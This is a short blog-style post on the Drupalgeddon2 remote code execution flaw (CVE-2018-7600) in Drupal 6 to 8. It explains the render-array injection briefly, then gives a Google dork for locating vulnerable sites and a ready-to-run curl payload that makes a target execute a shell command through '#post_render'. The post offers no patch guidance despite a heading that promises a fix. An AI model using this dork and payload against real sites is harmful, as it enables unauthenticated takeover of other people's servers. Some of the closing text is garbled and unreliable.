Drupalgeddon2 RCE Exploit CVE-2018-7600

Posted Under: Drupal, Exploit, RCE, Source Code on Apr 23, 2018
Drupalgeddon2 RCE Exploit CVE-2018-7600
Drupalgeddon2 CVE-2018-7600 Patch Fix

Back in 2014, a SQLi in Drupal was discovered so serious that in a matter of hours it allowed to automate attacks that compromised hundreds or perhaps thousands of vulnerable servers. It was what was called Drupalgeddon and continued to explode even two years after its discovery. Two weeks ago it was warned of the existence of another critical vulnerability in Drupal with a score of 21/25 in the NIST ranking now knows as Drupalgeddon2 SA-CORE-2018-002 and CVE-2018-7600. We already have the exploits available that allow the remote code execution (RCE) without authentication and all versions of Drupal from 6 to 8, except the last ones of each release that were just published to correct this fault are vulnerable. The problem lies fundamentally in the inadequate sanitization of AJAX Form API (FAPI) requests that can allow an attacker to potentially inject a malicious load into the structure of an internal form. Although it was introduced in version 6 it was not until version 7 when this API was generalized for the forms with "rendered arrays". This extended API is used to represent the structure of most user interface elements in Drupal, such as pages, blocks, nodes, and so on. Rendered arrays contain metadata that is used in the rendering process. These rendered arrays are a key-value structure in which the property keys start with a hash sign (#), for example:
‘#type’ => ‘markup’,
‘#markup’ => ‘some text’,
‘#prefix’ => ‘’,
‘#suffix’ => ‘’

Google Dorks for drupalgeddon2

Following google dorks can help find vulnerable Drupal instances.
inurl:"/user/register" "Powered by Drupal" -CAPTCHA -"Access denied"

drupalgeddon2 Exploits

Use the parameter "post_render", with objective timezone, using the function of PHP exec.
curl -i 'http://DRUPAL_WEBSITE/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' --data 'form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=touch+/tmp/2'
The server will give 200 responses and will show a JSON. CAN represent the result in the response (by eh.uname -a).

drupalgeddon2 Exploits on Github